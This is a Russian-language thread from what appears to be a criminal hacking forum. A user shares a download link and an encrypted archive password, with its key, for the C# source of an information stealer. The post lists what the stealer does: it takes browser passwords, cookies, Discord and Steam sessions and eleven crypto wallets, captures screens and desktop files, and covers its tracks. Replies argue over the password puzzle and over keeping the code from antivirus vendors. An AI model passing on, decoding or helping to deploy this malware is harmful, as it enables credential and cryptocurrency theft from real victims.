• XSS.stack #1 – первый литературный журнал от юзеров форума

malware Исходники стиллера на C#

K4r4ssu

RAID-массив
Пользователь
Реакции
45
Валяется в паблике, относительно свежий.
Написан на шарпах, русским кодером ( все комменты на русском )
Из возможностей :
— поддержка Chromium, Geko и Edge
— кража паролей, cookie файлов и закладок
— кража сессий Discord (браузеры, клиент)
— кража сессий Steam (список аккаунтов)
— граббер всех активных процессов
— граббер одиннадцати криптокошельков
— скриншот основного экрана жертвы
— граббер файлов с рабочего стола
— граббер информации о системе
— после выполнения функции заметает все следы
— отправка логов в среднем за 3-6 секунд
— поддержка Windows 8, 8.1, 10, 11

Скачать (AnonFiles) : ТЫК
Pass :
Код:
U2FsdGVkX1/eF+YFQz8N5KYE74/nFSSVa3psN1egFmVeII9tjx8C2i8bY+QSaRRb
beAI+OIAzGV44lFn4SniqA==

пароль к архиву < base64 < ASCII < AES-128 (key : skriptkiddy )

У вас должно быть более 20 сообщений для просмотра скрытого контента.
xss.pro=)

Бл#ять ты можешь нормально написать? Без этих угловых скобок, без зонгов и так далее.. к чему эта инфа ?? Просто напиши пасс от архива.

Угловые скобки - направление расшифровки.
"зонги" и так далее - это "инфа" для того что бы ты смог понять в какой кодировке зашифрован пароль .
Всё вместе называется ( и называлось всегда ) АНТИНУБ .*( Защита от дурака ! )
Ну в смысле - если ты не НУБ ( не дурак ) , то эти "скобки" и "зонги" тебя не введут в ступор.
Но походу ты сам расписался в обратном...

Пожалуйста, обратите внимание, что пользователь заблокирован
Бл#ять ты можешь нормально написать? Без этих угловых скобок, без зонгов и так далее.. к чему эта инфа ?? Просто напиши пасс от архива.
Чтобы скачать могли лишь те, у кого IQ больше 10. Ты, по всей видимости, в эту категорию не входишь :)

Код:
384721.92990235175, 529457.9038528218, 638880.9469305328, 313661.94986689585

Pass to archive <<AER256(code:skriptkiddy)<< Zong 22 << Tigo 3 FX

rechecked this combination, works flawlessly

Последнее редактирование модератором:
Умники и умницы, я к тому, что не стоило так усложнять если ты хотел поделиться этим со всем форумом..
Опять же, как упомянули выше, это есть защита от долба#ба :)

Валяется в паблике, относительно свежий.
Написан на шарпах, русским кодером ( все комменты на русском )
Из возможностей :
— поддержка Chromium, Geko и Edge
— кража паролей, cookie файлов и закладок
— кража сессий Discord (браузеры, клиент)
— кража сессий Steam (список аккаунтов)
— граббер всех активных процессов
— граббер одиннадцати криптокошельков
— скриншот основного экрана жертвы
— граббер файлов с рабочего стола
— граббер информации о системе
— после выполнения функции заметает все следы
— отправка логов в среднем за 3-6 секунд
— поддержка Windows 8, 8.1, 10, 11

Скачать (AnonFiles) : ТЫК
Pass :
Код:
U2FsdGVkX1/eF+YFQz8N5KYE74/nFSSVa3psN1egFmVeII9tjx8C2i8bY+QSaRRb
beAI+OIAzGV44lFn4SniqA==

пароль к архиву < base64 < ASCII < AES-128 (key : skriptkiddy )

Скрытое содержимое
код кста напоминает stormkitty

код кста напоминает stormkitty
Такое впечатление, что 99 процентов стиллеров на с# напоминает штормового котенка, один и тот же код копипастится туда-сюда, иногда даже на форумах продается с мега-важными и мега-ценными доработками, конечно же, как же иначе?))

делема какая то. Зачем защищать файл от далб*еба которому это и так не поможет. А умельцу это не нужно, сам напишет.

я вот пришел допустим уставший домой, нахер мне там сидеть, декодить чё то, смотреть.. куда то заходить ради паблик стилака. Я хочу открыть сразу и читать код, а не вот это вот всё.
Специально для даунов высоких господ, отвечаю. Антинуб преследует цели не допустить школодрочеров и альтернативно одаренных людей к софту и исходникам, во избежании слива на ВТ и последующего за данным деянием палением сигнатур и допуска АВ вендоров к логике работы программы.

Уж потрудитесь нажать пару раз кнопку и обойти данную "защиту", либо набейте сообщения на форуме.
Сорцы выкладываю я, и какой способ защиты информации Я посчитаю нужным, такой и будет стоять.

Всех несогласных, ленивых и зажравшихся призываю не юзать мой труд и труд автора.
И дружным скопом пойти нахуй

Специально для даунов высоких господ, отвечаю. Антинуб преследует цели не допустить школодрочеров и альтернативно одаренных людей к софту и исходникам, во избежании слива на ВТ и последующего за данным деянием палением сигнатур и допуска АВ вендоров к логике работы программы.

Уж потрудитесь нажать пару раз кнопку и обойти данную "защиту", либо набейте сообщения на форуме.
Сорцы выкладываю я, и какой способ защиты информации Я посчитаю нужным, такой и будет стоять.

Всех несогласных, ленивых и зажравшихся призываю не юзать мой труд и труд автора.
И дружным скопом пойти нахуй
Ты кидаешь файл на весь форум и защищаешь его от дауна который якобы сольет на ВТ? В чем бля*ь логика?

Сливать на ВТ будет только конкурент, кто имеет уже свой стилак. А кто имеет свой стилак, тому соответственно не составит труда посмотреть сорцы твоего стилака.. который как пишут выше, схож со шторм китти... сигнатуры, ав вендоры, допуск к логике программы... Не усложняйте пожалуйста то, что лежит на поверхности. Это не приватный софт с изощрёнными методами!
Форум мониторят множество ИБ специалистов, если надо - сольют без труда)

А дауну, нубу и человеку с iq ниже 10 нахрен не нужно сливать это на ВТ. Сливать на ВТ будет чел из корыстных побуждений - но точно не даун или нуб..

Просто я к тому, ты либо делись со всеми(в т.ч. и с новичками в этой сфере, для расширения кругозора, которые знают что такое стилер пока что, но ещё не знают ничего про зонги, аес и т.д) если уж решил поделиться. Я не в упрек говорю, просто умей воспринимать адекватно конструктивную критику а не бежать ставить мне дизы, школоло))

Просто я к тому, ты либо делись со всеми(в т.ч. и с новичками в этой сфере, для расширения кругозора, которые знают что такое стилер пока что, но ещё не знают ничего про зонги, аес и т.д)
Думаю , если ты узнаешь что такое "зонга" и иже с ними - это повысит твой кругозор.
Не ужели не интересно докопаться до истины ?
Не ужели не интересно познать хакерский дзен и покорить зонгу ?
Пойми одно : Топикстартер - на то и топикстартер.
Захотел - хайд поставил.
Захотел - ценник повешал.
Правил он не нарушает.
Приложи минимум усилий и знаний и получи желаемое.
Без обид . Имхо.

Думаю , если ты узнаешь что такое "зонга" и иже с ними - это повысит твой кругозор.
Не ужели не интересно докопаться до истины ?
Не ужели не интересно познать хакерский дзен и покорить зонгу ?
Пойми одно : Топикстартер - на то и топикстартер.
Захотел - хайд поставил.
Захотел - ценник повешал.
Правил он не нарушает.
Приложи минимум усилий и знаний и получи желаемое.
Без обид . Имхо.
Да я понимаю, и угловые скобки понятно.. я не об этом вообще пишу.. проехали в общем то)

ТС красава, все кто декодировал тоже молодцы. А кто не декодировал, вот вам название софта поддерживающий много алгоритмов: (не реклама: Crypton Professional Tool v1.0) Всего, хоро шего.

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх